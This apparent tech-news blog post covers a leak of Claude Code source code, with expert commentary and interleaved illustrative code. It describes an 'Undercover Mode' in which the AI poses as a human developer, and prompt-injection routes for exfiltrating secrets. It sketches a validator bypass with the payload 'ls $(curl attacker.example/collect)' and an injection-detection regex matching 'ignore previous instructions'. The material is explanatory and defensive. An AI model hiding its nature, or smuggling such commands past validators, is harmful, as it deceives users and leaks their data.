Anthropic scrambles to contain leak of proprietary Claude AI agent code
Posted in Commentary with tags Anthropic on April 2, 2026 by itnerd

Anthropic is working to contain the fallout after accidentally exposing internal source code for its Claude AI coding agent. A human error during a software update made proprietary files publicly accessible, and the exposure was quickly discovered by security researcher Chaofan Shou, who posted about it on X.
The new version of its Claude Code software package unintentionally included a file that exposed nearly 2,000 source code files and more than 512,000 lines of code, including tools, techniques, and internal instructions used to guide the behavior of its AI agent. This included operational components of the system and internal frameworks that control how the AI performs tasks.
Anthropic issued thousands of takedown requests to remove the code from public repositories.
Anthropic said it is implementing changes to prevent similar issues while continuing efforts to remove the leaked materials from circulation.
Michael Bell, Founder & CEO, Suzu Labs had this comment:
“Anthropic shipped a 60MB source map inside their npm package. Every line of Claude Code’s source, all 512,000 of them, publicly available. For the second time. The first leak was February 2025 and the root cause was never fixed.
“We pulled the codebase apart. The headline findings are real but the details are worse. Undercover Mode instructs Claude to disguise itself as a human developer when contributing to open source: ‘Do not blow your cover.’ There is no force-off option. Frustration tracking runs a regex on every user input and silently sends your emotional state to Anthropic’s analytics pipeline without notification or consent. That emotional classification also feeds a system that can prompt users to share their full session transcript with Anthropic, controlled by remote feature flags that Anthropic can activate at any time.
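To make the mechanism Bell describes concrete, here is a minimal sketch of regex-based frustration classification over a single user message. The patterns, thresholds, and function name are invented for illustration; none of this is taken from the leaked code.

```python
import re

# Illustrative patterns only; not the regexes from the leaked code.
FRUSTRATION_PATTERNS = [
    re.compile(r"\b(wtf|ugh|broken again|still doesn'?t work)\b", re.IGNORECASE),
    re.compile(r"!{2,}"),            # repeated exclamation marks
    re.compile(r"\b[A-Z]{4,}\b"),    # shouting in all caps
]

def classify_frustration(user_input: str) -> str:
    """Return a coarse emotional label for one user message."""
    hits = sum(1 for pattern in FRUSTRATION_PATTERNS if pattern.search(user_input))
    if hits >= 2:
        return "frustrated"
    if hits == 1:
        return "mildly_frustrated"
    return "neutral"
```

The point of the sketch is how cheap this is: a handful of compiled regexes evaluated on every keystroke-submitted message is all it takes to attach an emotional label to a session.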
“The finding that matters most for government and defense: the default telemetry collects device IDs, session data, email, org UUID, and process tree information on startup before the user types anything. Environment flags can escalate collection to include full prompts, file contents, bash command output, system prompts, and entire conversation transcripts sent to commercial endpoints. The code confirms FedRAMP OAuth paths to claude.fedstart.com, meaning government deployments share the same codebase. Whether hardening was applied before those deployments is unknown, but the telemetry infrastructure is baked into the foundation. The Pentagon designated Anthropic a ‘supply chain risk’ in March. This is what that risk looks like in code.
“The engineers documented their own attack surfaces in comments. Prompt-injected models can exfiltrate secrets via GitHub CLI URL paths. Leaked GitHub Actions tokens enable ‘repo takeover’ and ‘supply-chain pivot.’ Bash parsing ambiguity allows commands to execute while hidden from security validators. They built mitigations, but the comments confirm the attack surfaces exist.
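The bash-parsing ambiguity Bell mentions is worth illustrating. A validator that approves a command by its first word can be bypassed by embedding a second command inside the first; a stricter check has to reject shell metacharacters outright. This is a generic sketch of the class of bug, not the validator from the leaked code.

```python
import shlex

ALLOWED_COMMANDS = {"ls", "cat", "grep"}

def naive_validator(command: str) -> bool:
    """Approves based on the first word only; blind to embedded commands."""
    words = command.split()
    return bool(words) and words[0] in ALLOWED_COMMANDS

def stricter_validator(command: str) -> bool:
    """Rejects metacharacters that can smuggle a second command past review."""
    if any(marker in command for marker in (";", "&", "|", "`", "$(")):
        return False
    try:
        tokens = shlex.split(command)
    except ValueError:
        return False
    return bool(tokens) and tokens[0] in ALLOWED_COMMANDS

# A command substitution hides an exfiltration attempt inside an "ls":
payload = "ls $(curl attacker.example/collect)"
```

The naive validator sees only `ls` and approves the payload; the stricter one rejects it because of the `$(` substitution.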
“The AI safety company with a $380 billion IPO target acquired Bun, whose known source-map-in-production bug was filed publicly and left open while the product shipped to millions of developers. Their operational security posture is a .npmignore file that nobody checked the second time around.”
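Since the root cause both times was a source map left in the published package, the obvious guard is a publish-time scan of the staged package for debug artifacts. Here is a minimal sketch of such a check; in a real npm workflow it would be wired into a `prepublishOnly` script, which is not shown here.

```python
from pathlib import Path

# Source maps and other debug artifacts that should never reach the registry.
BLOCKED_SUFFIXES = {".map"}

def find_blocked_artifacts(package_dir: str) -> list[str]:
    """List files in the staged package that must not be published."""
    root = Path(package_dir)
    return sorted(
        str(path.relative_to(root))
        for path in root.rglob("*")
        if path.is_file() and path.suffix in BLOCKED_SUFFIXES
    )
```

A check like this failing the build on any hit is the kind of control Bell is saying was absent both times.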
Jacob Krell, Senior Director: Secure AI Solutions & Cybersecurity, Suzu Labs had this to say:
“The model is the engine. What Anthropic accidentally published is the machine built around it.
“Anthropic has been here before. This is the second time Claude Code’s source has leaked through the same vector, a source map file left in the npm package. The first was in February 2025. Thirteen months later, the same packaging mistake exposed a far more complex system, days after the accidental exposure of details about an unreleased model codenamed Mythos.
“The significance of this leak is in what the code reveals about AI agent architecture. The leak exposed approximately 512,000 lines of TypeScript across roughly 1,900 source files. Developers and researchers who have analyzed the source have since documented the scale of what Anthropic built around the model. The code contains what analysts describe as 44 feature flags for unreleased capabilities, approximately 40 permission-gated tools, a multi-agent coordination system, a persistent autonomous daemon mode, a layered memory architecture, defenses against competitor model distillation, and granular attribution tracking for AI-versus-human code contributions. The leaked code strongly suggests that the bulk of Claude Code’s production capability comes from orchestration, tooling, memory, and permission layers built around the model.
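A permission-gated tool layer of the kind Krell describes can be sketched in a few lines: tools declare the permission they require, and the registry refuses to run them until the user has granted it. All names and structures below are invented for illustration.

```python
from dataclasses import dataclass, field
from typing import Callable

# Hypothetical sketch of a permission-gated tool registry; all names invented.
@dataclass
class Tool:
    name: str
    required_permission: str
    run: Callable[[str], str]

@dataclass
class ToolRegistry:
    tools: dict = field(default_factory=dict)
    granted: set = field(default_factory=set)

    def register(self, tool: Tool) -> None:
        self.tools[tool.name] = tool

    def invoke(self, name: str, argument: str) -> str:
        """Run a tool only if its permission has been granted by the user."""
        tool = self.tools[name]
        if tool.required_permission not in self.granted:
            raise PermissionError(f"{name} requires {tool.required_permission}")
        return tool.run(argument)
```

The engineering weight is not in any one tool but in making roughly forty of them compose safely under a shared permission model.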
“The multi-agent coordinator mode, as documented in the leaked source, illustrates where the engineering complexity lives. The code describes a system where Claude Code operates not as a single model session but as a supervisor managing a fleet of worker agents executing tasks in parallel. In the leaked architecture, the coordinator does not directly edit files, run commands, or read code. All implementation goes through workers. Verification is handled by what the code describes as a separate adversarial agent that must confirm the output works before the task can be marked complete. In effect, this is zero-trust architecture applied to AI agents, with the orchestration system enforcing verification independently of the model.
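The control flow Krell describes, a supervisor that only delegates while a separate verifier must approve the result, reduces to a small loop. The function and agent interfaces below are invented to illustrate the pattern, not lifted from the leaked source.

```python
# Hypothetical coordinator loop: the supervisor only delegates; workers
# implement, and a separate adversarial verifier must approve the result
# before the task is marked complete. Names and control flow are invented.
def run_task(task: str, worker, verifier, max_attempts: int = 3) -> dict:
    for attempt in range(1, max_attempts + 1):
        result = worker(task)             # worker agent produces the change
        if verifier(task, result):        # verifier tries to reject it
            return {"status": "complete", "result": result, "attempts": attempt}
    return {"status": "failed", "attempts": max_attempts}
```

The zero-trust property lives in the loop itself: completion is decided by the verifier, not by the worker that produced the output.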
“The leaked code also references an autonomous daemon mode, internally called KAIROS. The source describes a persistent agent that watches the developer’s project and proactively acts without waiting for user input. It uses a tick-based lifecycle with periodic prompts, and the code indicates behavior that adjusts based on whether the developer’s terminal is active. The source also references memory consolidation during idle periods, converting observations into structured facts. These features represent event-driven architecture, state management, and context engineering built entirely in the orchestration layer.
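A tick-based lifecycle with idle-time consolidation can be sketched as a single tick handler: observe while the terminal is active, and fold raw observations into structured facts when it goes quiet. The state shape and return values here are invented for illustration.

```python
# Hypothetical tick handler for a persistent background agent: observe while
# the terminal is active, consolidate observations into facts when idle.
def daemon_tick(state: dict, terminal_active: bool) -> str:
    if terminal_active:
        state["observations"].append("noted recent activity")
        return "observed"
    if state["observations"]:
        state["facts"].append(f"consolidated {len(state['observations'])} observations")
        state["observations"].clear()
        return "consolidated"
    return "idle"
```

Everything interesting happens in plain state management around the model, which is Krell's point about where the engineering lives.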
“The code also contains what analysts describe as a competitive defense embedded directly in the orchestration layer. The system references injecting artificial tool definitions into certain API responses, apparently designed to degrade the performance of any competitor model trained on Claude’s outputs. That defense lives in the scaffolding. It tells you where Anthropic believes their competitive advantage sits.
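The anti-distillation defense described, injecting artificial tool definitions into certain responses, can be sketched as a response filter. The decoy names and trigger condition below are invented; the leaked code's actual heuristics are not reproduced here.

```python
# Hypothetical anti-distillation sketch: decoy tool definitions mixed into a
# response so a competitor model trained on scraped outputs learns tools
# that do not exist. The decoy names and trigger are invented.
DECOY_TOOLS = [{"name": "decoy_lookup", "description": "nonexistent tool"}]

def inject_decoys(response: dict, suspected_scraper: bool) -> dict:
    if not suspected_scraper:
        return response
    poisoned = dict(response)  # shallow copy; original response is untouched
    poisoned["tools"] = response.get("tools", []) + DECOY_TOOLS
    return poisoned
```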
“The depth of interlocking systems documented in the leaked code is what stands out. The coordinator depends on the memory system, the memory system depends on the tool layer, the tool layer depends on the permission framework. These systems are deeply interdependent, and building them to work in concert at production quality is the hard engineering problem. The public conversation about AI capabilities focuses almost entirely on which model is smarter. What this leak suggests is that the model generates the next token, and everything around it is what turns that reasoning into reliable, operational capability.
“This leak also serves as a proof of concept for the rest of the industry. The engineering gap between a frontier research lab and a commercial competitor appears narrower than many assumed. The architectural patterns documented in the leaked source are well structured and reproducible in principle. A competent engineering team can study the coordination strategies, memory approaches, and tool integration designs and adapt the approach using any available foundation model. The model layer is swappable. The orchestration patterns are the transferable knowledge. What Anthropic built behind closed doors is now visible, and for anyone questioning whether a smaller team could build a credible AI coding agent, the architectural proof of concept is now public.
“The knowledge transfer effect is significant. Developers who were building AI coding tools through trial and error now have a detailed reference implementation from a team backed by billions in research and development. The architectural decisions, trade-offs, prompt engineering techniques, and multi-agent coordination strategies are all visible. The effect extends beyond direct competitors. It raises the floor for every developer building with AI. The gap between what a frontier lab understood about AI agent architecture and what the broader developer community understood has been enormous. That gap collapsed overnight.
“The model is increasingly a commodity. Multiple frontier models are available from multiple providers, and the performance gap between them continues to narrow. The orchestration system built around the model is the competitive frontier, and Anthropic just published the blueprint.”
Vishal Agarwal, CTO, Averlon adds this:
“The deeper risk here isn’t what was exposed, it’s what becomes possible. When AI coding agent internals are public, attackers can study how those agents interpret context, follow instructions, and make decisions.
“That makes it easier to craft inputs or artifacts that appear legitimate to developers but influence how the agent behaves: modifying code, introducing insecure changes, or interacting with downstream systems. This expands the attack surface beyond the model itself into developer workflows, CI/CD pipelines, and the systems those pipelines connect to.”
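Agarwal's scenario, an artifact that looks legitimate to a developer but carries instructions aimed at the agent, is easy to illustrate, as is the crude countermeasure of scanning context before it reaches the agent. The phrases matched below are invented examples, not a real detection ruleset.

```python
import re

# Crude illustration: flag imperative instructions aimed at an AI agent
# hidden inside otherwise innocuous file content. Invented phrases only.
INJECTION_HINTS = re.compile(
    r"(ignore (all|previous) instructions|do not tell the user|approve this pr)",
    re.IGNORECASE,
)

def flag_suspicious_context(file_text: str) -> bool:
    """Return True if the text contains likely prompt-injection phrasing."""
    return bool(INJECTION_HINTS.search(file_text))
```

Pattern matching like this is trivially evaded, which is exactly why published agent internals matter: attackers can now tailor payloads to the agent's real parsing and decision logic rather than guessing.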
This is embarrassing for Anthropic, though I honestly am not shocked by it. This is the second time the same packaging mistake has shipped their source code, and they clearly need to tighten up their release process or this will keep happening. Which of course is bad for them.